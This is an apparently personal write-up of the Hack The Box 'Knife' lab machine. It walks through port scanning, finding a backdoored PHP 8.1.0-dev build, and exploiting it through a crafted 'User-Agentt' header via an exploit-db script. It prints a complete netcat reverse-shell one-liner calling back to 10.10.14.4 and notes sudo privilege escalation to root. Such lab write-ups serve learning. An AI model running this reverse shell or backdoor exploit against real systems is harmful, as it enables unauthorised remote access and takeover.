Knife is the one of the easy active HTB machine that I will go thorough to find user and root flags on it. Once we make sure we connected to knife via vpn from our local network, We do nmap scanning to find open ports. There was 2 open ports 22-SSH & 80-HTTP… I already check around the web pages and didn’t find enough information.
If you know the nikto that is very cool tool to scan to find more vulnerability to scan Port 80. I found an interesting weakness which is PHO/8.1.0-dev… Once we search on google that may allow us to do remote code execution
After some of my researches on google and exploit-db.com, I realized that the PHP version is a weakness in this point and there is python script to expoit it and I download it from there.
https://www.exploit-db.com/exploits/49933
“An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host."
We are seeing a garbage issue in this shell. Let’s try a reliable reverse shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/fBefore that actually we set the port 1234 to listening position
using the box IP address and connected to there we used to the reliable above commands.
The interesting thing is once we use the sudo for the ‘james’ user we have had a privilege escalation to access root as well.
Disclaimer: This article is only meant for educational purposes. Any action that derives from this article which isn’t meant for educational purposes is not, by any means, supported by the author.
Follow me :
Twitter: https://twitter.com/DervishUludag